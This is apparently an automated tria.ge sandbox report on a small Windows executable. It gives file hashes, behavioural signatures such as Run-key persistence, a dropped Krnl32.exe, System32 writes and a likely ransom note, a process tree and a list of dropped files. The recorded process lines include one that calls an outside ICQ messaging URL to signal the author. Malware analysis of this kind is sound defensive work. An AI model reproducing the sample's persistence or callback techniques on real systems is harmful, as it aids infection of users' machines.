Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    141s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/04/2024, 21:59

General

  • Target

    2dfc420e8e2ded37e48e0b1e27428012.exe

  • Size

    26KB

  • MD5

    2dfc420e8e2ded37e48e0b1e27428012

  • SHA1

    2f7f8b15c3df79d18e5eebcca9890ffa8b366177

  • SHA256

    7823df0cb61d8b5f63d1be188766fcfe1c78823917e2ff1b850a8b069ce55c8b

  • SHA512

    7dabf4e6bf680a98ec4b2537e6855bfd0a1d74968d1ec569d3c42a60c79b65b823922ed53fc5cffa1cd008668091f7dc4971437fd719fc64b40ad870a9d018fe

  • SSDEEP

    768:qq3G3q83wdv7GLGS1R9TNoINEx9jnhwrF:Jkq83wdv7Gt7

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in System32 directory 64 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 44 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 41 IoCs
  • Modifies registry class 2 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2dfc420e8e2ded37e48e0b1e27428012.exe
    "C:\Users\Admin\AppData\Local\Temp\2dfc420e8e2ded37e48e0b1e27428012.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4880
    • C:\Users\Admin\AppData\Local\Temp\Krnl32.exe
      "C:\Users\Admin\AppData\Local\Temp\Krnl32.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious use of WriteProcessMemory
      PID:2980
      • C:\Program Files\Internet Explorer\Iexplore.exe
        "C:\Program Files\Internet Explorer\Iexplore.exe" http://wwp.icq.com/scripts/WWPMsg.dll?from=M4TrIx&fromemail=_&subject=MATRIX&body=THE%20MATRIX%20HAS%20COME...&to=90017298%20HTTP/1.0
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1344
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1344 CREDAT:17410 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2540
    • C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\HELPME.TXT
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:5004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    471B

    MD5

    791c953dc08344d984806c877877efa7

    SHA1

    ffedf29a7c11bc153baefae839b4eb0e3df63609

    SHA256

    b4a79c0846bcf023a7b6bda17778e1b431d2ba0cef78cf5caac7161aa74253fa

    SHA512

    d157f9580ffd0a875643225ba70f45da3eee115ccb6828e5faa1d87616c7a324f592c365cee1e00bd00679a84dc6ee7dc8d349288e2cfc4f0c814cfc6ad588b4

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

    Filesize

    404B

    MD5

    42601a270af58e0f6d99ff58623b1705

    SHA1

    be2eda514b89db520a9ec4e8e858db783caff50a

    SHA256

    a33c904e02300a625d0186d5c6a3554872414e0133f194ad10e7caa3648a3182

    SHA512

    77f7d6e2776b5f519af0905414dc8579cde246afebcd4644fbae11344b5f86eb7ec27ecc7eee4c1215adaf14a9aa31384f0a5439038e105c4ca9a0a5510d2536

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\u6vsmf8\imagestore.dat

    Filesize

    4KB

    MD5

    e82ba0964dbd4ab51d9bbb3de5f345ab

    SHA1

    c50177859371ddef0eafdd562ed11fa5b4b30863

    SHA256

    7a447b3d7ce20d2a37f9102333d43962ab9a45a64dc42a70eaf670bbe8361952

    SHA512

    d414757e267c51304dc56dc7f66c1deb19b0a59808346d433ca1d495d8e473d61b10d3bfd1dcadae0f8ccc5f734bdf4f270f5efe3369511648902d2e6ce4fba3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\GAXHX86M\icon_web_60[1].png

    Filesize

    4KB

    MD5

    e9dbf6c742169ea700f8386bf639911b

    SHA1

    2fce93e1b217283c3d7c8ef275748ad69f840815

    SHA256

    3ce3371ecd679c4e218474046aa2a2ab067dbac5370b983aa8e7d91b208d816b

    SHA512

    2809218b84cda633e6c5c2e47d8d65c23c1ea05a88b5ee970c6bc6265223ef6e94f0d30605e1f15601ecdc68700eca299990314468a37109cac87b30c575d234

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\RXB2E2AL\suggestions[1].en-US

    Filesize

    17KB

    MD5

    5a34cb996293fde2cb7a4ac89587393a

    SHA1

    3c96c993500690d1a77873cd62bc639b3a10653f

    SHA256

    c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

    SHA512

    e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\XHJKUG17\en[1].htm

    Filesize

    62KB

    MD5

    d8db562dd4b19b7d1dec71cee88fe513

    SHA1

    f8374927d7205976f2e63cdbe9d482902e203c3b

    SHA256

    f94ad6af48f4c786bf3644818a8926efbe57b12a9379f41b26f31b90ba6de7f0

    SHA512

    0dd3299f8f24ef9b9b838f33dbfe07215e1f460df2c5dfeb2500766449feb7786564b74503f15ecc145bdbaf742e8df9cfc26aadb13385e3a6d0d190a8717e55

  • C:\Users\Admin\AppData\Local\Temp\HELPME.TXT

    Filesize

    67B

    MD5

    057798d389930107a381a2690141ac1d

    SHA1

    e44f1c2475c0f2323507e141dcae53ffef51c624

    SHA256

    5ba8c75f08589b808a6e16225ea565734aeeb23edc40894174d2d135f5e8d3d2

    SHA512

    98b40b6a11027974b482cb645718d34c8ee707ad01d6eba05acbf15a3b8d7c762afc08fef6513623fefe6e297d77a838fbb980d944a4a8e864356dfabac473e2

  • C:\Users\Admin\AppData\Local\Temp\Krnl32.exe

    Filesize

    26KB

    MD5

    3a21463b98e0098aca9d476dd45e4109

    SHA1

    64e1361e566d25ee3e24849f881577704b273f7d

    SHA256

    9780c1223c1767531e72d80a8eabdd891d8d95aa9de40033af62fd26658f6dd4

    SHA512

    caac7987f5fc90b5af4ee6e377ac978fea64e29fb07bfcc87cc23f9dd24988e15b5db409f7751735950d86780d26b980f428dabd2beed87a4bb1c5c2d28f8dd2

  • memory/2980-118-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-120-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-14-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-26-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-133-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-22-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-145-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-147-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/2980-149-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/4880-0-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB

  • memory/4880-20-0x0000000000400000-0x0000000000413000-memory.dmp

    Filesize

    76KB